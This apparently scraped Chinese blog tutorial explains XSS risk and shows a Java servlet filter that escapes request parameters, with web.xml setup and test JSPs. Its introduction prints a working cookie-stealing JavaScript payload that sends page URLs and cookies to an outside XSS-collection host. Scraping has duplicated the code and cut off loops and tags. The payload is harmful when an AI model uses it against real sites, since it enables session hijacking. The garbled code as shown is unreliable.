一 简介

如题所示,如果不在服务端对用户的输入信息进行过滤,然后该参数又直接在前台页面中展示,毫无疑问将会容易引发XSS攻击(跨站脚本攻击),比如说这样:

form表单中有这么一个字段:

XHTML

1

然后潜在攻击者在该字段上填入以下内容:

JavaScript

1

紧接着服务端忽略了“一切来至其他系统的数据都存在安全隐患”的原则,并没有对来至用户的数据进行过滤,导致了直接在前台页面中进行展示。很显然直接弹窗了:

java 過濾器讀取session的數據 javaxss过滤器_java xssfilter

当然,这里仅仅只是一个无伤大雅的弹窗,如果是恶意的攻击者呢?他可能会利用这个漏洞盗取cookie、篡改网页,甚至是配合CSRF漏洞伪造用户请求,形成大规模爆发的蠕虫病毒等等。

比如说远程加载这么一个js将会导致用户的cookie被窃取:

XHTML

(function(){(new Image()).src='http://xss.domain.com/index.php?do=api&id=ykvR5H&location='+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})());})();
if('1'==1){keep=new Image();keep.src='http://xss.domain.com/index.php?do=keepsession&id=ykvR5H&url='+escape(document.location)+'&cookie='+escape(document.cookie)};

1

2(function(){(newImage()).src='http://xss.domain.com/index.php?do=api&id=ykvR5H&location='+escape((function(){try{returndocument.location.href}catch(e){return''}})())+'&toplocation='+escape((function(){try{returntop.location.href}catch(e){return''}})())+'&cookie='+escape((function(){try{returndocument.cookie}catch(e){return''}})())+'&opener='+escape((function(){try{return(window.opener&&window.opener.location.href)?window.opener.location.href:''}catch(e){return''}})());})();
if('1'==1){keep=newImage();keep.src='http://xss.domain.com/index.php?do=keepsession&id=ykvR5H&url='+escape(document.location)+'&cookie='+escape(document.cookie)};

然后将可以在自己搭建的XSS平台中收到信息,比如像这样:

java 過濾器讀取session的數據 javaxss过滤器_java xssfilter

注:因为我在这个demo程序里没有设置cookie,因此cookie那一栏显示为空白

当然,值得庆幸的是,像国内一些主流的浏览器(如:360浏览器、猎豹浏览器)对这类常见的XSS payload都进行了过滤,查看网页源代码可以发现这些危险的字符均使用了鲜艳的红色字体进行了标注,同时该脚本并不能成功地执行:

java 過濾器讀取session的數據 javaxss过滤器_java xssfilter

不过,我发现我使用的IE10和最新版的Firefox都没有进行此项过滤,不得不说是个遗憾

注:我这里只是测试了猎豹、360、IE10以及火狐这四款浏览器,其他的没测试,因此不敢妄加评论

二 使用Filter过滤容易引发XSS的危险字符

(1)自定义一个过滤用的Filter:

Java
package cn.zifangsky.filter;
import java.io.IOException;
import java.util.Enumeration;
import java.util.Map;
import java.util.Vector;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
import javax.servlet.FilterChain;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletRequestWrapper;
import javax.servlet.http.HttpServletResponse;
import org.apache.commons.lang3.StringEscapeUtils;
import org.apache.commons.lang3.StringUtils;
import org.springframework.web.filter.OncePerRequestFilter;
public class XSSFilter extends OncePerRequestFilter {
private String exclude = null; //不需要过滤的路径集合
private Pattern pattern = null; //匹配不需要过滤路径的正则表达式
public void setExclude(String exclude) {
this.exclude = exclude;
pattern = Pattern.compile(getRegStr(exclude));
}
/**
* XSS过滤
*/
protected void doFilterInternal(HttpServletRequest request, HttpServletResponse response, FilterChain filterChain)
throws ServletException, IOException {
String requestURI = request.getRequestURI();
if(StringUtils.isNotBlank(requestURI))
requestURI = requestURI.replace(request.getContextPath(),"");
if(pattern.matcher(requestURI).matches())
filterChain.doFilter(request, response);
else{
EscapeScriptwrapper escapeScriptwrapper = new EscapeScriptwrapper(request);
filterChain.doFilter(escapeScriptwrapper, response);
}
}
/**
* 将传递进来的不需要过滤得路径集合的字符串格式化成一系列的正则规则
* @param str 不需要过滤的路径集合
* @return 正则表达式规则
* */
private String getRegStr(String str){
if(StringUtils.isNotBlank(str)){
String[] excludes = str.split(";"); //以分号进行分割
int length = excludes.length;
for(int i=0;i
String tmpExclude = excludes[i];
//对点、反斜杠和星号进行转义
tmpExclude = tmpExclude.replace("\\", "\\\\").replace(".", "\\.").replace("*", ".*");
tmpExclude = "^" + tmpExclude + "$";
excludes[i] = tmpExclude;
}
return StringUtils.join(excludes, "|");
}
return str;
}
/**
* 继承HttpServletRequestWrapper,创建装饰类,以达到修改HttpServletRequest参数的目的
* */
private class EscapeScriptwrapper extends HttpServletRequestWrapper{
private Map parameterMap; //所有参数的Map集合
public EscapeScriptwrapper(HttpServletRequest request) {
super(request);
parameterMap = request.getParameterMap();
}
//重写几个HttpServletRequestWrapper中的方法
/**
* 获取所有参数名
* @return 返回所有参数名
* */
@Override
public Enumeration getParameterNames() {
Vector vector = new Vector(parameterMap.keySet());
return vector.elements();
}
/**
* 获取指定参数名的值,如果有重复的参数名,则返回第一个的值
* 接收一般变量 ,如text类型
*
* @param name 指定参数名
* @return 指定参数名的值
* */
@Override
public String getParameter(String name) {
String[] results = parameterMap.get(name);
if(results == null || results.length <= 0)
return null;
else{
return escapeXSS(results[0]);
}
}
/**
* 获取指定参数名的所有值的数组,如:checkbox的所有数据
* 接收数组变量 ,如checkobx类型
* */
@Override
public String[] getParameterValues(String name) {
String[] results = parameterMap.get(name);
if(results == null || results.length <= 0)
return null;
else{
int length = results.length;
for(int i=0;i
results[i] = escapeXSS(results[i]);
}
return results;
}
}
/**
* 过滤字符串中的js脚本
* 解码:StringEscapeUtils.unescapeXml(escapedStr)
* */
private String escapeXSS(String str){
str = StringEscapeUtils.escapeXml(str);
Pattern tmpPattern = Pattern.compile("[sS][cC][rR][iI][pP][tT]");
Matcher tmpMatcher = tmpPattern.matcher(str);
if(tmpMatcher.find()){
str = tmpMatcher.replaceAll(tmpMatcher.group(0) + "\\\\");
}
return str;
}
}
}


141packagecn.zifangsky.filter;
importjava.io.IOException;
importjava.util.Enumeration;
importjava.util.Map;
importjava.util.Vector;
importjava.util.regex.Matcher;
importjava.util.regex.Pattern;
importjavax.servlet.FilterChain;
importjavax.servlet.ServletException;
importjavax.servlet.http.HttpServletRequest;
importjavax.servlet.http.HttpServletRequestWrapper;
importjavax.servlet.http.HttpServletResponse;
importorg.apache.commons.lang3.StringEscapeUtils;
importorg.apache.commons.lang3.StringUtils;
importorg.springframework.web.filter.OncePerRequestFilter;
publicclassXSSFilterextendsOncePerRequestFilter{
privateStringexclude=null;//不需要过滤的路径集合
privatePatternpattern=null;//匹配不需要过滤路径的正则表达式
publicvoidsetExclude(Stringexclude){
this.exclude=exclude;
pattern=Pattern.compile(getRegStr(exclude));
}
/**
* XSS过滤
*/
protectedvoiddoFilterInternal(HttpServletRequestrequest,HttpServletResponseresponse,FilterChainfilterChain)
throwsServletException,IOException{
StringrequestURI=request.getRequestURI();
if(StringUtils.isNotBlank(requestURI))
requestURI=requestURI.replace(request.getContextPath(),"");
if(pattern.matcher(requestURI).matches())
filterChain.doFilter(request,response);
else{
EscapeScriptwrapperescapeScriptwrapper=newEscapeScriptwrapper(request);
filterChain.doFilter(escapeScriptwrapper,response);
}
}
/**
* 将传递进来的不需要过滤得路径集合的字符串格式化成一系列的正则规则
* @param str 不需要过滤的路径集合
* @return 正则表达式规则
* */
privateStringgetRegStr(Stringstr){
if(StringUtils.isNotBlank(str)){
String[]excludes=str.split(";");//以分号进行分割
intlength=excludes.length;
for(inti=0;i
StringtmpExclude=excludes[i];
//对点、反斜杠和星号进行转义
tmpExclude=tmpExclude.replace("\\","\\\\").replace(".","\\.").replace("*",".*");
tmpExclude="^"+tmpExclude+"$";
excludes[i]=tmpExclude;
}
returnStringUtils.join(excludes,"|");
}
returnstr;
}
/**
* 继承HttpServletRequestWrapper,创建装饰类,以达到修改HttpServletRequest参数的目的
* */
privateclassEscapeScriptwrapperextendsHttpServletRequestWrapper{
privateMapparameterMap;//所有参数的Map集合
publicEscapeScriptwrapper(HttpServletRequestrequest){
super(request);
parameterMap=request.getParameterMap();
}
//重写几个HttpServletRequestWrapper中的方法
/**
* 获取所有参数名
* @return 返回所有参数名
* */
@Override
publicEnumerationgetParameterNames(){
Vectorvector=newVector(parameterMap.keySet());
returnvector.elements();
}
/**
* 获取指定参数名的值,如果有重复的参数名,则返回第一个的值
* 接收一般变量 ,如text类型
*
* @param name 指定参数名
* @return 指定参数名的值
* */
@Override
publicStringgetParameter(Stringname){
String[]results=parameterMap.get(name);
if(results==null||results.length<=0)
returnnull;
else{
returnescapeXSS(results[0]);
}
}
/**
* 获取指定参数名的所有值的数组,如:checkbox的所有数据
* 接收数组变量 ,如checkobx类型
* */
@Override
publicString[]getParameterValues(Stringname){
String[]results=parameterMap.get(name);
if(results==null||results.length<=0)
returnnull;
else{
intlength=results.length;
for(inti=0;i
results[i]=escapeXSS(results[i]);
}
returnresults;
}
}
/**
* 过滤字符串中的js脚本
* 解码:StringEscapeUtils.unescapeXml(escapedStr)
* */
privateStringescapeXSS(Stringstr){
str=StringEscapeUtils.escapeXml(str);
PatterntmpPattern=Pattern.compile("[sS][cC][rR][iI][pP][tT]");
MatchertmpMatcher=tmpPattern.matcher(str);
if(tmpMatcher.find()){
str=tmpMatcher.replaceAll(tmpMatcher.group(0)+"\\\\");
}
returnstr;
}
}
}
(2)在web.xml文件中将该过滤器放在最前面或者是字符编码过滤器之后:
XHTML
xssFilter
cn.zifangsky.filter.XSSFilter
exclude
/;/scripts/*;/styles/*;/images/*
xssFilter
*.html
REQUEST
FORWARD


xssFilter
cn.zifangsky.filter.XSSFilter
exclude
/;/scripts/*;/styles/*;/images/*
xssFilter
*.html
REQUEST
FORWARD

关于这个自定义的过滤器,我觉得有以下几点需要简单说明下:

i)我这里为了方便,没有自己手动写很多过滤规则,只是使用了commons-lang3-3.2.jar 这个jar包中的 StringEscapeUtils 这个方法类来进行过滤。在这个类中有以下几种过滤方法,分别是:escapeJava、escapeEcmaScript、escapeHtml3、escapeHtml4、escapeJson、escapeCsv、escapeEcmaScript 以及 escapeXml。关于这几种方法分别是如何进行过滤的可以自行查阅官方文档或者自己动手写一个简单的Demo进行测试。当然,我这里使用的是escapeXml这个方法进行过滤

ii)因为一个web工程中通常会存在js、CSS、图片这类静态资源目录的,很显然这些目录是不需要进行过滤的。因此我也做了这方面的处理,代码很简单,看看上面的例子就明白了,或者可以看看我的这篇文章:https://www.zifangsky.cn/647.html

iii)关于“在Filter中修改HttpServletRequest中的参数”这个问题,只需要自定义一个类继承与HttpServletRequestWrapper 这个类,然后复写几个方法即可。如果对这方面不太理解的同学可以看看我的这篇文章:https://www.zifangsky.cn/677.html

iv)在上面的过滤器中,我在escapeXSS(String str) 这个方法的后面还针对“# οnerrοr=javascript:alert(123)” 这种语句进行了专门的过滤。不过不过滤的话问题也不大,我觉得最多就是出现个弹窗,因为把尖括号和引号都给转义了,并不能够执行一些比较危险的操作

(3)两个测试的前台页面:

i)form表单页面input.jsp:

XHTML
pageEncoding="UTF-8"%>
String path = request.getContextPath();
String basePath = request.getScheme()+"://"+request.getServerName()+":"+request.getServerPort()+path+"/";
%>
FilterDemo


Please input you want to say:




pageEncoding="UTF-8"%>
Stringpath=request.getContextPath();
StringbasePath=request.getScheme()+"://"+request.getServerName()+":"+request.getServerPort()+path+"/";
%>
">
FilterDemo



Please input you want to say: